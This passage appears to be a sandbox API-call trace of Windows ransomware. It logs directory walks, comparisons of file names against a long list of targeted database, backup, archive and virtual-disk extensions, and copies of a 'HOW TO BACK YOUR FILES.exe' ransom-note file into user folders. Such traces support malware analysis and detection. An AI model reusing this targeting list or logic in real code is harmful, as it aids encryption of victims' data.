(lpString="sqlite3") returned 7 [0040.839] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.840] lstrlenW (lpString="sqlitedb") returned 8 [0040.840] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.840] lstrlenW (lpString="xml") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.840] lstrlenW (lpString="$er") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.840] lstrlenW (lpString="4dd") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.840] lstrlenW (lpString="4dl") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.840] lstrlenW (lpString="^^^") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.840] lstrlenW (lpString="abs") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.840] lstrlenW (lpString="abx") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.840] lstrlenW (lpString="accdb") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.840] lstrlenW (lpString="accdc") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.840] lstrlenW (lpString="accde") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.840] lstrlenW (lpString="accdr") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.840] lstrlenW (lpString="accdt") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.840] lstrlenW (lpString="accdw") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.840] lstrlenW (lpString="accft") returned 5 [0040.840] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.840] lstrlenW (lpString="adb") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.840] lstrlenW (lpString="adb") returned 3 [0040.840] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.840] lstrlenW (lpString="ade") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.841] lstrlenW (lpString="adf") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.841] lstrlenW (lpString="adn") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.841] lstrlenW (lpString="adp") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.841] lstrlenW (lpString="alf") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.841] lstrlenW (lpString="ask") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.841] lstrlenW (lpString="btr") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.841] lstrlenW (lpString="cat") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.841] lstrlenW (lpString="cdb") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.841] lstrlenW (lpString="ckp") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.841] lstrlenW (lpString="cma") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.841] lstrlenW (lpString="cpd") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.841] lstrlenW (lpString="dacpac") returned 6 [0040.841] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.841] lstrlenW (lpString="dad") returned 3 [0040.841] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.841] lstrlenW (lpString="dadiagrams") returned 10 [0040.841] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.841] lstrlenW (lpString="daschema") returned 8 [0040.841] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.841] lstrlenW (lpString="db-journal") returned 10 [0040.841] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.841] lstrlenW (lpString="db-shm") returned 6 [0040.842] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.842] lstrlenW (lpString="db-wal") returned 6 [0040.842] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.842] lstrlenW (lpString="dbc") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.842] lstrlenW (lpString="dbs") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.842] lstrlenW (lpString="dbt") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.842] lstrlenW (lpString="dbv") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.842] lstrlenW (lpString="dbx") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.842] lstrlenW (lpString="dcb") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.842] lstrlenW (lpString="dct") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.842] lstrlenW (lpString="dcx") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.842] lstrlenW (lpString="ddl") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.842] lstrlenW (lpString="dlis") returned 4 [0040.842] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.842] lstrlenW (lpString="dp1") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.842] lstrlenW (lpString="dqy") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.842] lstrlenW (lpString="dsk") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.842] lstrlenW (lpString="dsn") returned 3 [0040.842] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.842] lstrlenW (lpString="dtsx") returned 4 [0040.842] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.842] lstrlenW (lpString="dxl") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.843] lstrlenW (lpString="eco") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.843] lstrlenW (lpString="ecx") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.843] lstrlenW (lpString="edb") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.843] lstrlenW (lpString="epim") returned 4 [0040.843] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.843] lstrlenW (lpString="fcd") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.843] lstrlenW (lpString="fdb") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.843] lstrlenW (lpString="fic") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.843] lstrlenW (lpString="flexolibrary") returned 12 [0040.843] lstrlenW (lpString="fm5") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.843] lstrlenW (lpString="fmp") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.843] lstrlenW (lpString="fmp12") returned 5 [0040.843] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.843] lstrlenW (lpString="fmpsl") returned 5 [0040.843] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.843] lstrlenW (lpString="fol") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.843] lstrlenW (lpString="fp3") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.843] lstrlenW (lpString="fp4") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.843] lstrlenW (lpString="fp5") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.843] lstrlenW (lpString="fp7") returned 3 [0040.843] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.843] lstrlenW (lpString="fpt") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.844] lstrlenW (lpString="frm") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.844] lstrlenW (lpString="gdb") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.844] lstrlenW (lpString="gdb") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.844] lstrlenW (lpString="grdb") returned 4 [0040.844] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.844] lstrlenW (lpString="gwi") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.844] lstrlenW (lpString="hdb") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.844] lstrlenW (lpString="his") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.844] lstrlenW (lpString="ib") returned 2 [0040.844] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.844] lstrlenW (lpString="idb") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.844] lstrlenW (lpString="ihx") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.844] lstrlenW (lpString="itdb") returned 4 [0040.844] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.844] lstrlenW (lpString="itw") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.844] lstrlenW (lpString="jet") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.844] lstrlenW (lpString="jtx") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.844] lstrlenW (lpString="kdb") returned 3 [0040.844] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.844] lstrlenW (lpString="kexi") returned 4 [0040.844] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.844] lstrlenW (lpString="kexic") returned 5 [0040.845] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.845] lstrlenW (lpString="kexis") returned 5 [0040.845] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.845] lstrlenW (lpString="lgc") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.845] lstrlenW (lpString="lwx") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.845] lstrlenW (lpString="maf") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.845] lstrlenW (lpString="maq") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.845] lstrlenW (lpString="mar") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.845] lstrlenW (lpString="marshal") returned 7 [0040.845] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.845] lstrlenW (lpString="mas") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.845] lstrlenW (lpString="mav") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.845] lstrlenW (lpString="maw") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.845] lstrlenW (lpString="mdbhtml") returned 7 [0040.845] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.845] lstrlenW (lpString="mdn") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.845] lstrlenW (lpString="mdt") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.845] lstrlenW (lpString="mfd") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.845] lstrlenW (lpString="mpd") returned 3 [0040.845] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.845] lstrlenW (lpString="mrg") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.846] lstrlenW (lpString="mud") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.846] lstrlenW (lpString="mwb") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.846] lstrlenW (lpString="myd") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.846] lstrlenW (lpString="ndf") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.846] lstrlenW (lpString="nnt") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.846] lstrlenW (lpString="nrmlib") returned 6 [0040.846] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.846] lstrlenW (lpString="ns2") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.846] lstrlenW (lpString="ns3") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.846] lstrlenW (lpString="ns4") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.846] lstrlenW (lpString="nsf") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.846] lstrlenW (lpString="nv") returned 2 [0040.846] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.846] lstrlenW (lpString="nv2") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.846] lstrlenW (lpString="nwdb") returned 4 [0040.846] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.846] lstrlenW (lpString="nyf") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.846] lstrlenW (lpString="odb") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.846] lstrlenW (lpString="odb") returned 3 [0040.846] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.847] lstrlenW (lpString="oqy") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.847] lstrlenW (lpString="ora") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.847] lstrlenW (lpString="orx") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.847] lstrlenW (lpString="owc") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.847] lstrlenW (lpString="p96") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.847] lstrlenW (lpString="p97") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.847] lstrlenW (lpString="pan") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.847] lstrlenW (lpString="pdb") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.847] lstrlenW (lpString="pdm") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.847] lstrlenW (lpString="pnz") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.847] lstrlenW (lpString="qry") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.847] lstrlenW (lpString="qvd") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.847] lstrlenW (lpString="rbf") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.847] lstrlenW (lpString="rctd") returned 4 [0040.847] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.847] lstrlenW (lpString="rod") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.847] lstrlenW (lpString="rodx") returned 4 [0040.847] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.847] lstrlenW (lpString="rpd") returned 3 [0040.847] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.847] lstrlenW (lpString="rsd") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.848] lstrlenW (lpString="sas7bdat") returned 8 [0040.848] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.848] lstrlenW (lpString="sbf") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.848] lstrlenW (lpString="scx") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.848] lstrlenW (lpString="sdb") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.848] lstrlenW (lpString="sdc") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.848] lstrlenW (lpString="sdf") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.848] lstrlenW (lpString="sis") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.848] lstrlenW (lpString="spq") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.848] lstrlenW (lpString="te") returned 2 [0040.848] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.848] lstrlenW (lpString="teacher") returned 7 [0040.848] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.848] lstrlenW (lpString="tmd") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.848] lstrlenW (lpString="tps") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.848] lstrlenW (lpString="trc") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.848] lstrlenW (lpString="trc") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.848] lstrlenW (lpString="trm") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.848] lstrlenW (lpString="udb") returned 3 [0040.848] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.848] lstrlenW (lpString="udl") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.849] lstrlenW (lpString="usr") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.849] lstrlenW (lpString="v12") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.849] lstrlenW (lpString="vis") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.849] lstrlenW (lpString="vpd") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.849] lstrlenW (lpString="vvv") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.849] lstrlenW (lpString="wdb") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.849] lstrlenW (lpString="wmdb") returned 4 [0040.849] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.849] lstrlenW (lpString="wrk") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.849] lstrlenW (lpString="xdb") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.849] lstrlenW (lpString="xld") returned 3 [0040.849] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.849] lstrlenW (lpString="xmlff") returned 5 [0040.849] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.849] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.849] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.849] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0040.849] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.849] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0040.849] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\My Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents\\My Pictures") returned="C:\\Users\\Default User\\My Documents\\My Pictures" [0040.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0040.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0040.850] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Pictures") returned 46 [0040.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents\\My Pictures" | out: lpString1="C:\\Users\\Default User\\My Documents\\My Pictures") returned="C:\\Users\\Default User\\My Documents\\My Pictures" [0040.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.850] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0040.850] GetLastError () returned 0x0 [0040.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.850] ReadFile (in: hFile=0x160, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.851] CloseHandle (hObject=0x160) returned 1 [0040.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.851] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\My Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.851] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.851] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.851] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.851] lstrlenW (lpString="desktop.ini") returned 11 [0040.851] lstrlenW (lpString="Ares865") returned 7 [0040.851] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.851] lstrlenW (lpString=".dll") returned 4 [0040.851] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.851] lstrlenW (lpString=".lnk") returned 4 [0040.851] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.851] lstrlenW (lpString=".ini") returned 4 [0040.851] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.851] lstrlenW (lpString=".sys") returned 4 [0040.852] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.852] lstrlenW (lpString="desktop.ini") returned 11 [0040.852] lstrlenW (lpString="bak") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.852] lstrlenW (lpString="ba_") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.852] lstrlenW (lpString="dbb") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.852] lstrlenW (lpString="vmdk") returned 4 [0040.852] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.852] lstrlenW (lpString="rar") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.852] lstrlenW (lpString="zip") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.852] lstrlenW (lpString="tgz") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.852] lstrlenW (lpString="vbox") returned 4 [0040.852] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.852] lstrlenW (lpString="vdi") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.852] lstrlenW (lpString="vhd") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.852] lstrlenW (lpString="vhdx") returned 4 [0040.852] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.852] lstrlenW (lpString="avhd") returned 4 [0040.852] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.852] lstrlenW (lpString="db") returned 2 [0040.852] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.852] lstrlenW (lpString="db2") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.852] lstrlenW (lpString="db3") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.852] lstrlenW (lpString="dbf") returned 3 [0040.852] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.852] lstrlenW (lpString="mdf") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.853] lstrlenW (lpString="mdb") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.853] lstrlenW (lpString="sql") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.853] lstrlenW (lpString="sqlite") returned 6 [0040.853] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.853] lstrlenW (lpString="sqlite3") returned 7 [0040.853] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.853] lstrlenW (lpString="sqlitedb") returned 8 [0040.853] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.853] lstrlenW (lpString="xml") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.853] lstrlenW (lpString="$er") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.853] lstrlenW (lpString="4dd") returned 3 [0040.853] 